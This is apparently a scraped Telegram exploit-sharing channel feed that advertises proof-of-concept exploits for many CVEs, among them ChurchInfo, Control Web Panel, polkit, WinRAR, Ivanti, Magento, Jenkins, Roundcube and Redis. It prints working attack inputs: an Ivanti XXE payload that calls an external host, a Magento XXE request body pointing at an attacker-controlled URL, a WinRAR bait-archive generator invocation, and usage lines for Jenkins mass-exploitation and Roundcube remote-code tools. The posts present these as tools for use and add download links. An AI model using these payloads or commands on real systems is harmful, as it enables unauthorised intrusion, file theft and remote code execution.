CVE-2021-43258
ChurchInfo 1.2.13-1.3.0 Remote Code Execution Exploit
🌐 Github
#CVE #RemoteCode #Exploit #Php
➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗
👤 t.iss.one/MRvirusIRBOT
📢 t.iss.one/SashClient
🪩 Https://discord.gg/UfFvDYBBMM
🌐 Https://sash.mybin.ir
ChurchInfo 1.2.13-1.3.0 Remote Code Execution Exploit
#CVE #RemoteCode #Exploit #Php
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1
CVE-2022-31188_SSRF.txt
1.4 KB
CVAT 2.0 - SSRF (Server Side Request Forgery)
🗂 Description:
#CVAT is an opensource interactive video and image annotation tool for computer vision. Versions prior to 2.0.0 were found to be subject to a Server-side request forgery (SSRF) vulnerability.
#Validation has been added to urls used in the affected code path in version 2.0.0. Users are advised to upgrade.
⌨ Type: webapps
💻 Platform: Python
🌐 Vendor Homepage: 🌐 Github
🛡 Tested On: Version 1.7.0 - Ubuntu 20.04.4 LTS (GNU/Linux 5.4.0-122-generic x86_64)
👑 CVE: CVE-2022-31188
#CVE #SSRF #Exploit #Python
➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗
👤 t.iss.one/MRvirusIRBOT
📢 t.iss.one/SashClient
🪩 Https://discord.gg/UfFvDYBBMM
🌐 Https://sash.mybin.ir
#CVAT is an opensource interactive video and image annotation tool for computer vision. Versions prior to 2.0.0 were found to be subject to a Server-side request forgery (SSRF) vulnerability.
#Validation has been added to urls used in the affected code path in version 2.0.0. Users are advised to upgrade.
#CVE #SSRF #Exploit #Python
Please open Telegram to view this post
VIEW IN TELEGRAM
WordPress_Yith_WooCommerce_Gift_Cards_Premium_3_19_0_Shell_Upload.txt
4.2 KB
WordPress Yith WooCommerce Gift Cards Premium 3.19.0 Shell Upload Vulnerability
#CVE #Web_Applications #Php
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1
Control-Web-Panel.txt
3.8 KB
Control Web Panel Unauthenticated Remote Command Execution Exploit
➖ Category: remote exploits
🖥 Platform: linux
🪖 Risk: Security Risk Critical 🚨
🗂️ Size: 🅰 🅰 🅰 📝 📝
📝
Description: Control Web Panel versions prior to 0.9.8.1147 are vulnerable to unauthenticated OS command injection. Successful exploitation results in code execution as the root user. The results of the command are not contained within the HTTP response and the request will block while the command is running.
⭐ CVE: CVE-2022-44877
#CVE #Linux #Exploit
➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗
👤 t.iss.one/MRvirusIRBOT
📢 t.iss.one/SashClient
🪩 Https://discord.gg/UfFvDYBBMM
🌐 Https://sash.mybin.ir
Description: Control Web Panel versions prior to 0.9.8.1147 are vulnerable to unauthenticated OS command injection. Successful exploitation results in code execution as the root user. The results of the command are not contained within the HTTP response and the request will block while the command is running.
#CVE #Linux #Exploit
Please open Telegram to view this post
VIEW IN TELEGRAM
CVE-2021-4034
One day for the polkit privilege escalation exploit
Just execute
GitHub
#CVE #POC
➖➖➖➖➖➖➖➖➖➖
👤 t.iss.one/MRvirusIRBOT
📢 t.iss.one/BugCod3
One day for the polkit privilege escalation exploit
Just execute
make, ./cve-2021-4034 and enjoy your root shell.GitHub
#CVE #POC
➖➖➖➖➖➖➖➖➖➖
👤 t.iss.one/MRvirusIRBOT
📢 t.iss.one/BugCod3
SugarCRM 12.x Remote Code Execution / Shell Upload Exploit
Category: remote exploits
Platform: php
Risk: [Security Risk Critical]
Description:
This Metasploit module exploits CVE-2023-22952, a remote code execution vulnerability in SugarCRM 11.0 Enterprise, Professional, Sell, Serve, and Ultimate versions prior to 11.0.5 and SugarCRM 12.0 Enterprise, Sell, and Serve versions prior to 12.0.2.
CVE: 2023-22952
Download
#CVE #Exploit #Rc #Shell
➖➖➖➖➖➖➖➖➖➖
👤 t.iss.one/MRvirusIRBOT
📢 t.iss.one/BugCod3
Category: remote exploits
Platform: php
Risk: [Security Risk Critical]
Description:
This Metasploit module exploits CVE-2023-22952, a remote code execution vulnerability in SugarCRM 11.0 Enterprise, Professional, Sell, Serve, and Ultimate versions prior to 11.0.5 and SugarCRM 12.0 Enterprise, Sell, and Serve versions prior to 12.0.2.
CVE: 2023-22952
Download
#CVE #Exploit #Rc #Shell
➖➖➖➖➖➖➖➖➖➖
👤 t.iss.one/MRvirusIRBOT
📢 t.iss.one/BugCod3
This media is not supported in your browser
VIEW IN TELEGRAM
CVE-2020-0796 Remote overflow POC
CVE-2020–0796, is pre-remote code execution vulnerability that resides in the Server Message Block 3.0 (SMBv3) network communication protocol
Which devices does the CVE-2020-0796 affect?
+ Windows 10 Version 1903 for 32-bit Systems
+ Windows 10 Version 1903 for ARM64-based Systems
+ Windows 10 Version 1903 for x64-based Systems
+ Windows 10 Version 1909 for 32-bit Systems
+ Windows 10 Version 1909 for ARM64-based Systems
+ Windows 10 Version 1909 for x64-based Systems
+ Windows Server, version 1903 (Server Core installation)
+ Windows Server, version 1909 (Server Core installation)
GitHub
GitHub
#CVE #Microsoft #POC
➖➖➖➖➖➖➖➖➖➖
👤 t.iss.one/MRvirusIRBOT
📢 t.iss.one/BugCod3
CVE-2020–0796, is pre-remote code execution vulnerability that resides in the Server Message Block 3.0 (SMBv3) network communication protocol
Which devices does the CVE-2020-0796 affect?
+ Windows 10 Version 1903 for 32-bit Systems
+ Windows 10 Version 1903 for ARM64-based Systems
+ Windows 10 Version 1903 for x64-based Systems
+ Windows 10 Version 1909 for 32-bit Systems
+ Windows 10 Version 1909 for ARM64-based Systems
+ Windows 10 Version 1909 for x64-based Systems
+ Windows Server, version 1903 (Server Core installation)
+ Windows Server, version 1909 (Server Core installation)
GitHub
GitHub
#CVE #Microsoft #POC
➖➖➖➖➖➖➖➖➖➖
👤 t.iss.one/MRvirusIRBOT
📢 t.iss.one/BugCod3
Generate the default poc for test
python cve-2023-38831-exp-gen.py poc
or
python cve-2023-38831-exp-gen.py CLASSIFIED_DOCUMENTS.pdf script.bat poc.rar
python cve-2023-38831-exp-gen.py <bait name> <script name> <output name>
to generate your exploit
BugCod3#CVE #Winrar #Exploit
Please open Telegram to view this post
VIEW IN TELEGRAM
❤4⚡1👍1 1
CVE-2024-22024
XXE on Ivanti Connect Secure
☠️ payload encoded base64:
send it to:
#bugbountytips #cve #Ivanti
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 t.iss.one/BugCod3BOT
📣 t.iss.one/BugCod3
XXE on Ivanti Connect Secure
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % xxe SYSTEM "https://{{external-host}}/x"> %xxe;]><r></r>send it to:
127.0.0.1/dana-na/auth/saml-sso.cgi with SAMLRequest parm#bugbountytips #cve #Ivanti
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡2❤2🔥1
Exploitation and scanning tool specifically designed for Jenkins versions
<= 2.441 & <= LTS 2.426.2. It leverages CVE-2024-23897 to assess and exploit vulnerabilities in Jenkins instances.Ensure you have the necessary permissions to scan and exploit the target systems. Use this tool responsibly and ethically.
python CVE-2024-23897.py -t <target> -p <port> -f <file>
or
python CVE-2024-23897.py -i <input_file> -f <file>
-t or --target: Specify the target IP(s). Supports single IP, IP range, comma-separated list, or CIDR block.-i or --input-file: Path to input file containing hosts in the format of https://1.2.3.4:8080/ (one per line).-o or --output-file: Export results to file (optional).-p or --port: Specify the port number. Default is 8080 (optional).-f or --file: Specify the file to read on the target system.BugCod3#CVE #PoC #Scanner
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡4❤3🔥1
CNEXT exploits
💬
Exploits for CNEXT (CVE-2024-2961), a buffer overflow in the glibc's iconv()
👁🗨 Technical analysis:
The vulnerability and exploits are described in the following blogposts:
⚪️ Iconv, set the charset to RCE: Exploiting the glibc to hack the PHP engine (part 1)
⚪️ To be continued...
🗝 Exploits:
Exploits will become available as blogposts come out.
⚪️ CNEXT: file read to RCE exploit
⚪️ To be continued...
😸 Github
⬇️ Download
🔒
#CVE #Exploit #Cnext
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 t.iss.one/BugCod3BOT
📣 t.iss.one/BugCod3
Exploits for CNEXT (CVE-2024-2961), a buffer overflow in the glibc's iconv()
The vulnerability and exploits are described in the following blogposts:
Exploits will become available as blogposts come out.
BugCod3#CVE #Exploit #Cnext
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡2🔥2❤1
CVE-2024-34102 POC
POST /rest/V1/guest-carts/1/estimate-shipping-methods HTTP/2
#CVE #POC
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 t.iss.one/BugCod3BOT
📣 t.iss.one/BugCod3
POST /rest/V1/guest-carts/1/estimate-shipping-methods HTTP/2
{"address":{"totalsCollector":{"collectorList":{"totalCollector":{"sourceData":{"data":"https://attacker*com/xxe.xml","dataIsURL":true,"options":1337}}}}}}#CVE #POC
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡2🔥2❤1
CVE-2024-55591
A Fortinet FortiOS Authentication Bypass Vulnerable Behaviour Detection
💬
Description:
This script attempts to create a WebSocket connection at a random URI from a pre-authenticated perspective to the FortiOS management interface, and reviews the response to determine if the instance is vulnerable
Affected Versions:
⚪️ FortiOS 7.0.0 through 7.0.16
⚪️ FortiProxy 7.0.0 through 7.0.19
⚪️ FortiProxy 7.2.0 through 7.2.12
😸 Github
⬇️ Download
🔒
#Python #CVE #Vulnerable #Detection
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 t.iss.one/BugCod3BOT
📣 t.iss.one/BugCod3
A Fortinet FortiOS Authentication Bypass Vulnerable Behaviour Detection
Description:
This script attempts to create a WebSocket connection at a random URI from a pre-authenticated perspective to the FortiOS management interface, and reviews the response to determine if the instance is vulnerable
Affected Versions:
BugCod3#Python #CVE #Vulnerable #Detection
Please open Telegram to view this post
VIEW IN TELEGRAM
👍4❤3🔥3⚡2👎1
WordPress A/B Image Optimizer 3.3 Plugin Arbitrary File Download Vulnerability
📊 Category: web applications
💻 Platform: php
🪖 Risk: Security Risk High 🚨
💬
WordPress Plugin A/B Image Optimizer plugin versions 3.3 and below suffers from an arbitrary file download vulnerability.
🔥 CVE: CVE-2025-25163
⬇️ Download
🔒
#CVE #Exploit #PHP #WordPress
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 t.iss.one/BugCod3BOT
📣 t.iss.one/BugCod3
WordPress Plugin A/B Image Optimizer plugin versions 3.3 and below suffers from an arbitrary file download vulnerability.
BugCod3#CVE #Exploit #PHP #WordPress
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡5❤4👍3🔥3
CVE-2025-49113 - Roundcube Remote Code Execution
A proof-of-concept exploit for CVE-2025-49113, a remote code execution vulnerability in Roundcube Webmail.
💬 Description:
This exploit targets a deserialization vulnerability in Roundcube Webmail versions 1.5.0 through 1.6.10. The vulnerability allows an authenticated attacker to execute arbitrary code on the server.
🏴☠️ Vulnerable Versions:
⚪️ 1.5.0 - 1.5.9
⚪️ 1.6.0 - 1.6.10
🖇 Requirements:
⚪️ PHP 7.0 or higher
⚪️ cURL extension enabled
⚪️ Target running a vulnerable version of Roundcube
💻 Usage:
🔼 Example:
Github
⬇️ Download
🔒
#CVE #PHP #RemoteCode
➖➖➖➖➖➖➖➖➖➖
👤 t.iss.one/BugCod3BOT
📣 t.iss.one/BugCod3
A proof-of-concept exploit for CVE-2025-49113, a remote code execution vulnerability in Roundcube Webmail.
💬 Description:
This exploit targets a deserialization vulnerability in Roundcube Webmail versions 1.5.0 through 1.6.10. The vulnerability allows an authenticated attacker to execute arbitrary code on the server.
🏴☠️ Vulnerable Versions:
⚪️ 1.5.0 - 1.5.9
⚪️ 1.6.0 - 1.6.10
🖇 Requirements:
⚪️ PHP 7.0 or higher
⚪️ cURL extension enabled
⚪️ Target running a vulnerable version of Roundcube
💻 Usage:
php CVE-2025-49113.php <url> <username> <password> <command>
🔼 Example:
php CVE-2025-49113.php https://localhost/roundcube/ admin password "id"
Github
⬇️ Download
🔒
BugCod3#CVE #PHP #RemoteCode
➖➖➖➖➖➖➖➖➖➖
👤 t.iss.one/BugCod3BOT
📣 t.iss.one/BugCod3
⚡4❤3🔥3
Researchers discovered a critical Redis vulnerability called RediShell 🗡
(CVE-2025-49844) a CVSS 10 remote code execution flaw affecting all Redis versions. It allows attackers to send a malicious Lua script, escape the sandbox, and execute code on the host. Around 330,000 Redis instances are exposed online, 60,000 of them without authentication, and over 75% of cloud environments use Redis⚡️
CVE-2025-49844 (RediShell) POC🛡
Github
#cve #poc #exploit #redishell #redis
Join Exploit Forge🔝
Join Exploit Forge Forum👑
Join BugCod3🤝
(CVE-2025-49844) a CVSS 10 remote code execution flaw affecting all Redis versions. It allows attackers to send a malicious Lua script, escape the sandbox, and execute code on the host. Around 330,000 Redis instances are exposed online, 60,000 of them without authentication, and over 75% of cloud environments use Redis
CVE-2025-49844 (RediShell) POC
Github
#cve #poc #exploit #redishell #redis
Join Exploit Forge
Join Exploit Forge Forum
Join BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥7❤🔥3❤2⚡1